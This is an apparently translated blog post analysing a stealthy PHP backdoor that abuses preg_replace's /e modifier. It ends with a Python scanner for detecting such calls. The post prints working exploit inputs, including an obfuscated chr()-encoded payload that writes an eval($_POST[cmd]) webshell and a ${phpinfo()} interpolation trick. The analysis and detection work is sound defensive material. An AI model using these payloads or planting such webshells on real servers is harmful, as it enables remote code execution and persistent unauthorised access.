There are many PHP backdoors, and I have seen and played with Baozi a lot, but while helping a friend check his server I came across the following malicious code.
Here is what happened. I ran various backdoor search tools over my friend's website and none of them found a PHP Trojan. I just could not find it. Xiao Hei's trick was quite advanced: every time he used the backdoor I deleted it, yet he got back in every time, and I could not find where he was coming in. This was really painful.
Later I finally found some clues in the logs. My analysis showed that one IP kept POSTing strange data to a particular file. A while later, the same IP accessed an inexplicable file with a very conspicuous name. It was obviously not a normal system file but a PHP backdoor, and soon after it had been used, the backdoor was deleted.
Haha, Xiao Hei is very careful, I'll give him that.
Further analysis turned up the code in the file Xiao Hei had been accessing:
The code is as follows:
No antivirus software could detect it.
preg_replace function prototype:
mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])
Special note:
The /e modifier causes preg_replace() to treat the replacement argument as PHP code (after the appropriate backreferences have been substituted). Tip: make sure replacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace().
The code above receives its data via POST, which is more cumbersome to test. If it is changed to take the data from GET instead...
Example:
The code is as follows:
<?php echo preg_replace("/test/e", $_GET["h"], "just test"); ?>
If we submit ?h=phpinfo(), phpinfo() is executed: with the /e modifier, preg_replace treats the replacement parameter as PHP code and executes it.
The code is as follows:
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
The chr() sequence decodes to:
fputs(fopen('data/a.php','w'),'<?php eval($_POST[cmd])?>');
Executing it writes a one-sentence Trojan file, a.php, into the /data/ directory.
This is terrifying...
Another, trickier example:
The code is as follows:
<?php
function test($str) { }
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", 'test("\1")', $_GET["h"]);
?>
Submit ?h=[php]phpinfo()[/php]: will phpinfo() be executed? Definitely not. After the regex matches, the replacement parameter becomes 'test("phpinfo")', and at that point phpinfo is only passed as a string argument. Is there a way to make it execute? Of course. If we submit ?h=[php]{${phpinfo()}}[/php] instead, phpinfo() will be executed. Why?
In PHP, a variable inside a double-quoted string is replaced by the result of interpreting that variable; variables inside single-quoted strings are not processed. Note: a function call written inside double quotes is not executed and substituted, but ${phpinfo()} is interpreted and executed.
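As an added defensive example (not code from the original post), here is a small Python scanner that flags preg_replace() calls whose pattern carries the /e modifier, the construct both examples above rely on, and notes whether the replacement or subject argument is read from a request superglobal. The PHP sample it scans is constructed from the snippets on this page; the helper names are my own.

```python
import re
TAINT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)\b")  # attacker-controlled input
# Constructed sample PHP source, modelled on the snippets discussed above.
SAMPLE_PHP = r'''<?php
echo preg_replace("/test/e", $_GET["h"], "just test");
function test($str) { }
echo preg_replace("/\s*\[php\](.+?)\[\/php\]\s*/ies", 'test("\1")', $_GET["h"]);
echo preg_replace('/\s+/', ' ', $text);   // no /e modifier: not flagged
?>'''

def split_args(s):
    # Split a PHP argument list at top-level commas, honouring quotes and brackets.
    args, cur, depth, quote, i = [], [], 0, None, 0
    while i < len(s):
        c = s[i]
        if quote:                                  # inside a string literal
            cur.append(c)
            if c == "\\" and i + 1 < len(s):       # keep escaped char, e.g. \" or \1
                cur.append(s[i + 1]); i += 1
            elif c == quote:
                quote = None
        elif c in "'\"":
            quote = c; cur.append(c)
        elif c in "([{":
            depth += 1; cur.append(c)
        elif c in ")]}":
            if depth == 0:
                break                              # closing paren of the call itself
            depth -= 1; cur.append(c)
        elif c == "," and depth == 0:
            args.append("".join(cur).strip()); cur = []
        else:
            cur.append(c)
        i += 1
    return args + ["".join(cur).strip()]           # last argument (may be empty)

def find_preg_replace_e(source):
    # Report preg_replace() calls using /e, noting which args read superglobals.
    findings = []
    for m in re.finditer(r"\bpreg_replace\s*\(", source):
        args = split_args(source[m.end():])
        if len(args) < 3 or args[0][:1] not in ("'", '"'):
            continue                               # non-literal pattern: not decidable here
        body = args[0][1:-1]                       # pattern without its PHP quotes
        close = {"(": ")", "[": "]", "{": "}", "<": ">"}.get(body[:1], body[:1])
        if "e" in body[body.rfind(close) + 1:]:    # modifiers follow the closing delimiter
            tainted = [i for i in (1, 2) if TAINT.search(args[i])]
            findings.append({"line": source.count("\n", 0, m.start()) + 1,
                             "pattern": args[0], "tainted_args": tainted})
    return findings
```

The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0; preg_replace_callback() is the safe replacement for legitimate uses.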